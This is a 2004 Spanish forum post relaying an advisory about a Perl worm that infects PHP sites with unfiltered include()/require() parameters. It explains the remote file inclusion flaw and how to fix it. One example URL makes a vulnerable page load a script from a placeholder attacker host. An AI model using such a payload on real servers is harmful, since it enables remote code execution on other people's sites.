Ver las NORMAS de estos Foros Web ZackYFileS Chat ZackYFileS Agregar a Favoritos Contactar con Administrador
 
 

TU PUBLICIDAD AQUÍ!!
Navegación
Retroceder   Foros ZackYFileS >
OTROS TEMAS DE INTERES - INTERNET:
 > HARDWARE y SOFTWARE del PC > SOFTWARE del PC - PROGRAMAS y S.O.
Actualizar esta página Nuevo gusano para servidores web con PHP
Nombre de usuario
Contraseña
Configuración de UsuarioAyuda (FAQs)Nuevos PostsBuscar


Respuesta
 
Herramientas
Antiguo 28/12/2004, 02:39   #1
caminero21 
Moderador Indio
 
Avatar de caminero21
 
Fecha de ingreso: 13/nov/2003
Mensajes: 742
caminero21 tiene un espectacular aura a su alrededorcaminero21 tiene un espectacular aura a su alrededorcaminero21 tiene un espectacular aura a su alrededor
Nuevo gusano para servidores web con PHP
Este nuevo espécimen puede infectar cualquier sitio web PHP que
contenga ciertos errores de programación. Al igual que "Santy",
también utiliza motores de búsqueda para localizar webs
potencialmente vulnerables, en esta ocasión Google Brasil y Yahoo.

Aunque en principio algunas casas antivirus lo han relacionado con el
gusano Santy que aprovechaba vulnerabilidades de phpBB, en realidad se
trata de un nuevo gusano que puede afectar a cualquier sitio web que
utilice PHP y que no haya sido programado de forma segura.

Es importante que los antivirus modifiquen el nombre dado al gusano,
que en un principio ha sido tratado como si fuera una variante de
Santy. Aunque tiene muchas similitudes, es importante tratarlo como
un nuevo gusano, ya que de lo contrario puede crear confusión si los
webmasters y programadores PHP piensan que sólo afecta a los sitios
web con una versión vulnerable de phpBB. En este sentido Kaspersky
lo ha pasado a denominar "Spyki" (Net-Worm.Perl.Spyki).

El nuevo gusano, escrito en Perl, aprovecha si el programador de la
página PHP ha hecho uso de las funciones include() y require() sin
filtrar adecuadamente los parámetros de entrada, lo que facilita al
atacante, o en este caso al gusano, insertar y ejecutar archivos en
el servidor de forma arbitraria.

En realidad se trata de una de las reglas básicas de la programación
segura que todo diseñador web debe tener en cuenta. Nunca debe de
abrir un archivo basándose en un parámetro externo sin comprobar
la validez del mismo. Pese a ello, es un error frecuente el permitir
hacer referencias a archivos externos, o internos saliendo de la
raíz pública del web, a través de un parámetro en la URL.

De forma que si nosotros tenemos un script para abrir archivos HTML
del servidor web, que por ejemplo podemos llamar de esta forma:

[url]http://nuestroservidor/abrepagina.php?htm=index.htm[/url]

Un atacante podría provocar que cargara en su lugar un script
malicioso, o un gusano como en el caso que nos ocupa, de la forma:

[url]http://nuestroservidor/abrepagina.php?htm=http://atacante/gusano.php[/url]

La solución pasa por evitar parámetros de forma arbitraria cuando
programamos el script PHP, filtrando todas las referencias que no
se ajusten a las páginas legítimas del servidor web.
__________________
Prefiero morir de pie que vivir de rodillas

Puede que nos quiten la vida, pero jamas nos quitaran la libertad
caminero21 está desconectado
Respuesta rápida a este mensaje
Responder Citando Subir
Publicidad: Conoce las ofertas de ANUNCIATE
Respuesta

« Tema Anterior | Próximo Tema »

Usuarios viendo actualmente este tema: 1 (0 usuarios registrados y 1 visitantes)
 

Permisos para publicar mensajes
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes
Los BB code están Activado
Los Emoticones están Activado
El código [IMG] está Activado
El Código HTML está Activado
Ir al foro

Temas similares
Tema Autor Foro Resp. Último mensaje
COMO AJUSTAR UNA ANTENA Alfonso ANTENAS SAT: Instalación y Orientación 11 16/03/2005 11:42


!! ADVERTENCIAS !!: Las informaciones aquí publicadas NO CONTIENEN KEYS para la decodificación de ningún sistema: NO SON OPERATIVOS en sistemas SAT que precisen de su correspondiente suscripción.

ESTA TOTALMENTE PROHIBIDO EL USO DE ESTAS INFORMACIONES PARA LA MODIFICACIÓN O  DEFRAUDACIÓN DE SISTEMAS DE ACCESO CONDICIONAL.

ESTOS FOROS SON MODERADOS Y NO SE PERMITE LA PUBLICACIÓN DE INFORMACIONES ILEGALES POR PARTE DE LOS USUARIOS. EN CASO DE DETECTARSE ESTE TIPO DE INFORMACIONES, LOS USUARIOS SERÁN EXCLUIDOS DE ESTAS PÁGINAS.

USO DE COOKIES: Utilizamos COOKIES y de terceros para mejorar nuestros servicios y navegación por la web. Si continua navegando, consideramos que acepta su uso.  

La franja horaria es GMT +2. Ahora son las 09:56.


-------------------------------------------------------------------- --------------------------------------------------------------------

Powered por vBulletin™ Version 3.8.10
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.
Traducido por vBsoporte - vBulletin en español
Hispaservicios - J.G.C - 29112549T - Rio Cinca, 2, 30 (50180) SPAIN.
Todos los derechos reservados. Prohibida cualquier reproducion total o parcial.


Foros Patrocinados por anunciantes.